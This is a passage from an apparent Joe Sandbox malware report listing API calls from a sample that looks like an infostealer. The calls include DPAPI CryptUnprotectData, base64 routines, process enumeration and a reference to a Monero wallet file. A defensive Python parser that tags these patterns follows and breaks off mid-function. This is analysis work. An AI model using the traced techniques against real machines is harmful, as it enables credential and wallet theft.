                     • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$BinaryCryptStringlstrlen
                    • String ID:
                    • API String ID: 189259977-0
                    • Opcode ID: 9d143cdc05088bd3fbe3ae84c8453c759d56eccd05a204ada3c95835ba32be87
                    • Instruction ID: 5ea66b762585220e324cf1c557747a10c286e2fcbb496c54fe13ff440e943e32
                    • Opcode Fuzzy Hash: 9d143cdc05088bd3fbe3ae84c8453c759d56eccd05a204ada3c95835ba32be87
                    • Instruction Fuzzy Hash: A0417FB590421ADFDB10DFA0DD89BEEB7B8BB88304F1045A9F509A7280DB745B84CF91
                    APIs
                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0095724D
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00957254
                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00957281
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 009572A4
                    • LocalFree.KERNEL32(?), ref: 009572AE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                     • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                    • String ID:
                    • API String ID: 2609814428-0
                    • Opcode ID: 7e1ebc93952a491b16464c15ff4a3a4c9d5a2bd93c4b7f5efa903730a7482345
                    • Instruction ID: 7c2a349942e16281946b26ea0831334da97e131f3b53b5b2598fc5105454ddc3
                    • Opcode Fuzzy Hash: 7e1ebc93952a491b16464c15ff4a3a4c9d5a2bd93c4b7f5efa903730a7482345
                    • Instruction Fuzzy Hash: 67011275A40308BBDB10DFD4DD4AF9E77B8EB44701F108555FB05BB2C0DA70AA008BA5
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0096961E
                    • Process32First.KERNEL32(00970ACA,00000128), ref: 00969632
                    • Process32Next.KERNEL32(00970ACA,00000128), ref: 00969647
                    • StrCmpCA.SHLWAPI(?,00000000), ref: 0096965C
                    • CloseHandle.KERNEL32(00970ACA), ref: 0096967A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                     • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                    • String ID:
                    • API String ID: 420147892-0
                    • Opcode ID: 4c126c2ea41c1cc78d2ca468b8f97a0952dc32efaadec6a101684f351d727c1f
                    • Instruction ID: f92e8f2611372717b346dbdba2ac13d5b8fa76eaa251599077d050bb3ad0cd28
                    • Opcode Fuzzy Hash: 4c126c2ea41c1cc78d2ca468b8f97a0952dc32efaadec6a101684f351d727c1f
                    • Instruction Fuzzy Hash: EF010C75A00308ABCB14DFA5CD98BEDB7FCEB48300F104189A906A7240DB749B40CF91
                    APIs
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,009705B7), ref: 009686CA
                    • Process32First.KERNEL32(?,00000128), ref: 009686DE
                    • Process32Next.KERNEL32(?,00000128), ref: 009686F3
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                    • CloseHandle.KERNEL32(?), ref: 00968761
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                     • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                    • String ID:
                    • API String ID: 1066202413-0
                    • Opcode ID: 2705fa32a49222a1661cd52449438bf134a723dd684b1ec7d4eefc0966a62077
                    • Instruction ID: 2e6acbe6911103f2a7ed0e2024a63106f175f65017d286def46e429c15900483
                    • Opcode Fuzzy Hash: 2705fa32a49222a1661cd52449438bf134a723dd684b1ec7d4eefc0966a62077
                    • Instruction Fuzzy Hash: C6313971901218ABCB24DF95CD45FEEB778EB85700F10429AB50AB31A0DF346A45CFA2
                    APIs
                    • CryptBinaryToStringA.CRYPT32(00000000,00955184,40000001,00000000,00000000,?,00955184), ref: 00968EC0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: BinaryCryptString
                    • String ID:
                    • API String ID: 80407269-0
                    • Opcode ID: e9e62fd4157d79536e63aafa5e88ce9e458dafd693c70cc10ad0d50a5d91daee
                    • Instruction ID: 32aa6721a8504b0304bc324f8d4927a407d0f7938b46e109a94487efb822776a
                    • Opcode Fuzzy Hash: e9e62fd4157d79536e63aafa5e88ce9e458dafd693c70cc10ad0d50a5d91daee
                    • Instruction Fuzzy Hash: 78111C74200204BFDB00CFA4D885FA733A9AF89300F109A48F9158B250DB35EC41EBA0
                    APIs
                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00954EEE,00000000,00000000), ref: 00959AEF
                    • LocalAlloc.KERNEL32(00000040,?,?,?,00954EEE,00000000,?), ref: 00959B01
                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00954EEE,00000000,00000000), ref: 00959B2A
                    • LocalFree.KERNEL32(?,?,?,?,00954EEE,00000000,?), ref: 00959B3F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: BinaryCryptLocalString$AllocFree
                    • String ID:
                    • API String ID: 4291131564-0
                    • Opcode ID: f52c8496b9b0c9993e88c24ae111aaf40ca02d7da923a532c3eb5c1472899edd
                    • Instruction ID: 9a4ac8466ba734623fa18f6948ecc98912d04455e9221242be5647ee08fe9c4d
                    • Opcode Fuzzy Hash: f52c8496b9b0c9993e88c24ae111aaf40ca02d7da923a532c3eb5c1472899edd
                    • Instruction Fuzzy Hash: B211A4B4240208EFEB10CF64DD95FAA77B9FB89701F208059FD199B390CB75A901CB90
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00970E00,00000000,?), ref: 009679B0
                    • RtlAllocateHeap.NTDLL(00000000), ref: 009679B7
                    • GetLocalTime.KERNEL32(?,?,?,?,?,00970E00,00000000,?), ref: 009679C4
                    • wsprintfA.USER32 ref: 009679F3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                    • String ID:
                    • API String ID: 377395780-0
                    • Opcode ID: 46574e4c5b1a31fec4ac9ba1207cf62ed0252b10d0588ec5460cf2ca50fca7d2
                    • Instruction ID: 70be2ecf73c53fcde00bd02cae48598d2e35ac3c152d97f5b4cd5d7d7d9ad83f
                    • Opcode Fuzzy Hash: 46574e4c5b1a31fec4ac9ba1207cf62ed0252b10d0588ec5460cf2ca50fca7d2
                    • Instruction Fuzzy Hash: 891109B2904118ABCB14DFDADE45BBEB7F8FB4CB11F10465AF605A2280E7795940CBB1
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,005BE128,00000000,?,00970E10,00000000,?,00000000,00000000), ref: 00967A63
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00967A6A
                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,005BE128,00000000,?,00970E10,00000000,?,00000000,00000000,?), ref: 00967A7D
                    • wsprintfA.USER32 ref: 00967AB7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                    • String ID:
                    • API String ID: 3317088062-0
                    • Opcode ID: 2db8d0c96f368c32a19f6b8f3a89689737e6258816b1fe0db40c20d9551b69ab
                    • Instruction ID: 0e106e7dd639d47b2e99009abd03c09611240a93fce1a13badffbebfc224e0b6
                    • Opcode Fuzzy Hash: 2db8d0c96f368c32a19f6b8f3a89689737e6258816b1fe0db40c20d9551b69ab
                    • Instruction Fuzzy Hash: AF118EB1A45218EBEB208B94DD49FA9BB78FB44721F1047DAE91A932C0DB741A40CF91
                    APIs
                    • CoCreateInstance.COMBASE(0096E118,00000000,00000001,0096E108,00000000), ref: 00963758
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 009637B0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharCreateInstanceMultiWide
                    • String ID:
                    • API String ID: 123533781-0
                    • Opcode ID: 7c1f7ef3be0483dbfcc43410914f946cba89e8c38967556e665721285d70763b
                    • Instruction ID: 1878820275aefc22cc05fe3d96dd44dca49c3dd05b1b6d327ae1dee9b79fbdd2
                    • Opcode Fuzzy Hash: 7c1f7ef3be0483dbfcc43410914f946cba89e8c38967556e665721285d70763b
                    • Instruction Fuzzy Hash: 4541F674A00A289FDB24DB58CC95BDBB7B5BB48702F4091D9E608A72D0E771AE85CF50
                    APIs
                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00959B84
                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00959BA3
                    • LocalFree.KERNEL32(?), ref: 00959BD3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Local$AllocCryptDataFreeUnprotect
                    • String ID:
                    • API String ID: 2068576380-0
                    • Opcode ID: 75dcce5789ae37f69f63c7ae5db9036fd85f3405c11b76155ce8f95d3e6fd404
                    • Instruction ID: fd43f704b046eed256b9bd25496f310c3f695a14451ee002e29f0f16dfa71ff1
                    • Opcode Fuzzy Hash: 75dcce5789ae37f69f63c7ae5db9036fd85f3405c11b76155ce8f95d3e6fd404
                    • Instruction Fuzzy Hash: 8A11CCB4A00209DFDB04DF94D985AAE77B9FF89300F104559ED15A7350D774AE14CFA1
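The crypt32 listings above are the part of this report an analyst reads most closely: a base64 encode (CryptBinaryToStringA with dwFlags 40000001, i.e. CRYPT_STRING_BASE64 with CRYPT_STRING_NOCRLF), a base64 decode done as size query, LocalAlloc, decode (the paired CryptStringToBinaryA calls), and a DPAPI CryptUnprotectData call whose pOptionalEntropy argument is NULL. As an added example, not code from Joe Sandbox or from the sample, here is a Python parser that turns these per-function API listings into records and tags those patterns so the same check can be run over a whole exported report. The tag names, the summarize helper and the four-block SAMPLE (copied from the blocks above) are this example's own assumptions; dwFlags is read as the third argument of the CryptString/CryptBinary calls as the report prints them.

```python
"""Parse Joe Sandbox per-function API listings and tag patterns seen in this sample (example code)."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR"
API_RE = re.compile(r"^•\s*(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
OPCODE_RE = re.compile(r"^•\s*Opcode ID:\s*(?P<id>[0-9a-f]+)\s*$")
CRYPT_STRING_BASE64 = 0x1  # low word of dwFlags in the CryptString*/CryptBinary* APIs

@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]  # hex strings as printed; "?" where the sandbox could not resolve the value
    ref: int         # call-site address

@dataclass
class FunctionRecord:
    calls: list[ApiCall] = field(default_factory=list)
    opcode_id: str = ""

# Constructed input: four blocks copied from the report section above.
SAMPLE = """\
APIs
• CryptBinaryToStringA.CRYPT32(00000000,00955184,40000001,00000000,00000000,?,00955184), ref: 00968EC0
• Opcode ID: e9e62fd4157d79536e63aafa5e88ce9e458dafd693c70cc10ad0d50a5d91daee
APIs
• CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00954EEE,00000000,00000000), ref: 00959AEF
• LocalAlloc.KERNEL32(00000040,?,?,?,00954EEE,00000000,?), ref: 00959B01
• CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00954EEE,00000000,00000000), ref: 00959B2A
• LocalFree.KERNEL32(?,?,?,?,00954EEE,00000000,?), ref: 00959B3F
Memory Dump Source
• Opcode ID: f52c8496b9b0c9993e88c24ae111aaf40ca02d7da923a532c3eb5c1472899edd
APIs
• GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00970E00,00000000,?), ref: 009679B0
• RtlAllocateHeap.NTDLL(00000000), ref: 009679B7
• GetLocalTime.KERNEL32(?,?,?,?,?,00970E00,00000000,?), ref: 009679C4
• wsprintfA.USER32 ref: 009679F3
• Opcode ID: 46574e4c5b1a31fec4ac9ba1207cf62ed0252b10d0588ec5460cf2ca50fca7d2
APIs
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00959B84
• LocalAlloc.KERNEL32(00000040,00000000), ref: 00959BA3
• LocalFree.KERNEL32(?), ref: 00959BD3
• Opcode ID: 75dcce5789ae37f69f63c7ae5db9036fd85f3405c11b76155ce8f95d3e6fd404
"""

def parse_report(text: str) -> list[FunctionRecord]:
    """Split the listing into one record per function block."""
    records: list[FunctionRecord] = []
    current: FunctionRecord | None = None
    for raw in text.splitlines():
        line = raw.strip()
        # "APIs"/"Strings" open a block; "Memory Dump Source" after a finished block opens an API-less one.
        if line in ("APIs", "Strings") or (
            line == "Memory Dump Source" and (current is None or current.opcode_id)
        ):
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None:
            continue
        if m := API_RE.match(line):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            current.calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16)))
        elif m := OPCODE_RE.match(line):
            current.opcode_id = m["id"]
    return records

def _hex_arg(call: ApiCall, idx: int) -> int | None:  # argument idx as int, None if absent or "?"
    if idx >= len(call.args) or call.args[idx] == "?":
        return None
    return int(call.args[idx], 16)

def tag_record(rec: FunctionRecord) -> set[str]:
    """Tag names are this example's own labels, not Joe Sandbox signatures."""
    tags: set[str] = set()
    names = [c.name for c in rec.calls]
    for c in rec.calls:
        flags = _hex_arg(c, 2)  # dwFlags is the third parameter of CryptStringToBinary/CryptBinaryToString
        is_b64 = flags is not None and (flags & 0xFFFF) == CRYPT_STRING_BASE64
        if c.name.startswith("CryptStringToBinary") and is_b64:
            tags.add("base64_decode")
        if c.name.startswith("CryptBinaryToString") and is_b64:
            tags.add("base64_encode")
        if c.name == "CryptUnprotectData":
            tags.add("dpapi_unprotect")
            if _hex_arg(c, 2) == 0:  # pOptionalEntropy == NULL: no extra secret needed to unprotect
                tags.add("dpapi_no_entropy")
        if c.name in ("GetLocalTime", "GetTimeZoneInformation") and "wsprintfA" in names:
            tags.add("timestamp_format")
    # Two decode calls with an allocation between them: size query, allocate, decode.
    dec = [i for i, n in enumerate(names) if n.startswith("CryptStringToBinary")]
    if len(dec) >= 2 and any(n in ("LocalAlloc", "HeapAlloc", "RtlAllocateHeap") for n in names[dec[0]:dec[-1]]):
        tags.add("sized_decode")
    return tags

def summarize(text: str) -> dict[str, set[str]]:
    # Opcode ID -> tags, untagged functions omitted
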